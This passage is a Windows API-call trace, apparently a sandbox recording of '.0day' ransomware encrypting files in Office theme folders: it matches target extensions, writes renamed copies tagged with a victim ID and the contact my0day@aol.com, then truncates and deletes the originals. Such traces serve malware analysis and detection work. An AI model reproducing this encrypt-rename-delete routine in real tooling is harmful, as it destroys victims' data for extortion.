-1 [0045.947] lstrlenW (lpString=".docx") returned 5 [0045.948] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.948] lstrlenW (lpString=".pdf") returned 4 [0045.948] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.948] lstrlenW (lpString=".xls") returned 4 [0045.948] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.948] lstrlenW (lpString=".xlsx") returned 5 [0045.948] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.948] lstrlenW (lpString=".ppt") returned 4 [0045.948] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.948] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75 [0045.948] lstrlenW (lpString=".zip") returned 4 [0045.948] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.948] lstrlenW (lpString=".rar") returned 4 [0045.948] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.948] lstrlenW (lpString=".bz2") returned 4 [0045.948] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.948] lstrlenW (lpString=".7z") returned 3 [0045.948] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.948] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75 [0045.948] lstrlenW (lpString=".dbf") returned 4 [0045.948] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.948] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75 [0045.948] lstrlenW (lpString=".1cd") returned 4 [0045.948] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.948] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75 [0045.948] lstrlenW (lpString=".jpg") returned 4 [0045.948] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.948] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75 [0045.948] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75 [0045.948] lstrlenW (lpString=".doc") returned 4 [0045.948] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.948] lstrlenW (lpString=".docx") returned 5 [0045.948] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.948] lstrlenW (lpString=".pdf") returned 4 [0045.949] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.949] lstrlenW (lpString=".xls") returned 4 [0045.949] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.949] lstrlenW (lpString=".xlsx") returned 5 [0045.949] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.949] lstrlenW (lpString=".ppt") returned 4 [0045.949] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.949] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75 [0045.949] lstrlenW (lpString=".zip") returned 4 [0045.949] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.949] lstrlenW (lpString=".rar") returned 4 [0045.949] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.949] lstrlenW (lpString=".bz2") returned 4 [0045.949] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.949] lstrlenW (lpString=".7z") returned 3 [0045.949] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.949] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75 [0045.949] lstrlenW (lpString=".dbf") returned 4 [0045.949] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.949] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75 [0045.949] lstrlenW (lpString=".1cd") returned 4 [0045.949] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.949] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75 [0045.949] lstrlenW (lpString=".jpg") returned 4 [0045.949] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.949] lstrcmpiW (lpString1=".PNG", lpString2=".0day") returned 1 [0045.949] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0045.949] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0045.950] GetFileSizeEx (in: hFile=0x1d8, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=33559) returned 1 [0045.950] CloseHandle (hObject=0x1d8) returned 1 [0045.950] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\thmbnail.png")) returned 0x20 [0045.950] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0045.950] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0045.950] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0045.950] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0045.950] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0045.950] GetLastError () returned 0x0 [0045.950] ReadFile (in: hFile=0x1d8, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x8317, lpOverlapped=0x0) returned 1 [0045.952] WriteFile (in: hFile=0x1fc, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x8320, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x8320, lpOverlapped=0x0) returned 1 [0045.954] ReadFile (in: hFile=0x1d8, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0045.954] WriteFile (in: hFile=0x1fc, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xec, lpOverlapped=0x0) returned 1 [0045.954] SetEndOfFile (hFile=0x1fc) returned 1 [0045.954] CloseHandle (hObject=0x1fc) returned 1 [0045.954] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0045.954] SetEndOfFile (hFile=0x1d8) returned 1 [0045.955] CloseHandle (hObject=0x1d8) returned 1 [0045.955] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0045.956] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\thmbnail.png")) returned 1 [0045.956] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75 [0045.956] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75 [0045.956] lstrlenW (lpString=".doc") returned 4 [0045.956] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.956] lstrlenW (lpString=".docx") returned 5 [0045.956] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.956] lstrlenW (lpString=".pdf") returned 4 [0045.956] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.956] lstrlenW (lpString=".xls") returned 4 [0045.956] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.956] lstrlenW (lpString=".xlsx") returned 5 [0045.956] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.956] lstrlenW (lpString=".ppt") returned 4 [0045.956] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.956] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75 [0045.956] lstrlenW (lpString=".zip") returned 4 [0045.956] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.956] lstrlenW (lpString=".rar") returned 4 [0045.957] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.957] lstrlenW (lpString=".bz2") returned 4 [0045.957] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.957] lstrlenW (lpString=".7z") returned 3 [0045.957] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.957] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75 [0045.957] lstrlenW (lpString=".dbf") returned 4 [0045.957] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.957] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75 [0045.957] lstrlenW (lpString=".1cd") returned 4 [0045.957] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.957] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75 [0045.957] lstrlenW (lpString=".jpg") returned 4 [0045.957] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.957] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75 [0045.957] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75 [0045.957] lstrlenW (lpString=".doc") returned 4 [0045.957] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.957] lstrlenW (lpString=".docx") returned 5 [0045.957] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.957] lstrlenW (lpString=".pdf") returned 4 [0045.957] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.957] lstrlenW (lpString=".xls") returned 4 [0045.957] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.957] lstrlenW (lpString=".xlsx") returned 5 [0045.957] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.957] lstrlenW (lpString=".ppt") returned 4 [0045.957] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.957] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75 [0045.957] lstrlenW (lpString=".zip") returned 4 [0045.957] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.957] lstrlenW (lpString=".rar") returned 4 [0045.957] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.958] lstrlenW (lpString=".bz2") returned 4 [0045.958] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.958] lstrlenW (lpString=".7z") returned 3 [0045.958] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.958] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75 [0045.958] lstrlenW (lpString=".dbf") returned 4 [0045.958] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.958] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75 [0045.958] lstrlenW (lpString=".1cd") returned 4 [0045.958] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.958] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75 [0045.958] lstrlenW (lpString=".jpg") returned 4 [0045.958] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.958] lstrcmpiW (lpString1=".GIF", lpString2=".0day") returned 1 [0045.958] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0045.958] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0045.958] GetFileSizeEx (in: hFile=0x1d8, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=2476) returned 1 [0045.958] CloseHandle (hObject=0x1d8) returned 1 [0045.958] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\preview.gif")) returned 0x20 [0045.959] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\preview.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0045.959] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0045.959] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0045.959] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0045.959] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\preview.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0045.960] GetLastError () returned 0x0 [0045.961] ReadFile (in: hFile=0x1d8, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x9ac, lpOverlapped=0x0) returned 1 [0045.962] WriteFile (in: hFile=0x1fc, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x9b0, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x9b0, lpOverlapped=0x0) returned 1 [0045.963] ReadFile (in: hFile=0x1d8, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0045.963] WriteFile (in: hFile=0x1fc, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xea, lpOverlapped=0x0) returned 1 [0045.963] SetEndOfFile (hFile=0x1fc) returned 1 [0045.963] CloseHandle (hObject=0x1fc) returned 1 [0045.963] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0045.963] SetEndOfFile (hFile=0x1d8) returned 1 [0045.964] CloseHandle (hObject=0x1d8) returned 1 [0045.964] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0045.964] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\preview.gif")) returned 1 [0045.965] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72 [0045.965] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72 [0045.965] lstrlenW (lpString=".doc") returned 4 [0045.965] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.965] lstrlenW (lpString=".docx") returned 5 [0045.965] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.965] lstrlenW (lpString=".pdf") returned 4 [0045.965] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.965] lstrlenW (lpString=".xls") returned 4 [0045.965] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.965] lstrlenW (lpString=".xlsx") returned 5 [0045.965] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.965] lstrlenW (lpString=".ppt") returned 4 [0045.965] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.965] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72 [0045.965] lstrlenW (lpString=".zip") returned 4 [0045.965] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.965] lstrlenW (lpString=".rar") returned 4 [0045.965] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.965] lstrlenW (lpString=".bz2") returned 4 [0045.965] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.965] lstrlenW (lpString=".7z") returned 3 [0045.965] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.965] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72 [0045.965] lstrlenW (lpString=".dbf") returned 4 [0045.965] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.965] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72 [0045.965] lstrlenW (lpString=".1cd") returned 4 [0045.965] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.965] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72 [0045.966] lstrlenW (lpString=".jpg") returned 4 [0045.966] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.966] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72 [0045.966] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72 [0045.966] lstrlenW (lpString=".doc") returned 4 [0045.966] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.966] lstrlenW (lpString=".docx") returned 5 [0045.966] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.966] lstrlenW (lpString=".pdf") returned 4 [0045.966] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.966] lstrlenW (lpString=".xls") returned 4 [0045.966] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.966] lstrlenW (lpString=".xlsx") returned 5 [0045.966] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.966] lstrlenW (lpString=".ppt") returned 4 [0045.966] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.966] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72 [0045.966] lstrlenW (lpString=".zip") returned 4 [0045.966] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.966] lstrlenW (lpString=".rar") returned 4 [0045.966] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.966] lstrlenW (lpString=".bz2") returned 4 [0045.966] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.966] lstrlenW (lpString=".7z") returned 3 [0045.966] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.966] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72 [0045.966] lstrlenW (lpString=".dbf") returned 4 [0045.966] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.966] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72 [0045.966] lstrlenW (lpString=".1cd") returned 4 [0045.966] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.966] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72 [0045.966] lstrlenW (lpString=".jpg") returned 4 [0045.966] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.967] lstrcmpiW (lpString1=".PNG", lpString2=".0day") returned 1 [0045.967] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0045.967] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0045.967] GetFileSizeEx (in: hFile=0x1d8, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=19485) returned 1 [0045.967] CloseHandle (hObject=0x1d8) returned 1 [0045.967] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\thmbnail.png")) returned 0x20 [0045.967] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0045.967] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0045.967] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0045.967] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0045.967] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0045.968] GetLastError () returned 0x0 [0045.968] ReadFile (in: hFile=0x1d8, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x4c1d, lpOverlapped=0x0) returned 1 [0045.969] WriteFile (in: hFile=0x1fc, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x4c20, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x4c20, lpOverlapped=0x0) returned 1 [0045.970] ReadFile (in: hFile=0x1d8, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0045.970] WriteFile (in: hFile=0x1fc, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xec, lpOverlapped=0x0) returned 1 [0045.970] SetEndOfFile (hFile=0x1fc) returned 1 [0045.971] CloseHandle (hObject=0x1fc) returned 1 [0045.971] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0045.971] SetEndOfFile (hFile=0x1d8) returned 1 [0045.972] CloseHandle (hObject=0x1d8) returned 1 [0045.972] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0045.972] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\thmbnail.png")) returned 1 [0045.972] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73 [0045.972] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73 [0045.972] lstrlenW (lpString=".doc") returned 4 [0045.972] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.972] lstrlenW (lpString=".docx") returned 5 [0045.972] lstrcmpiW 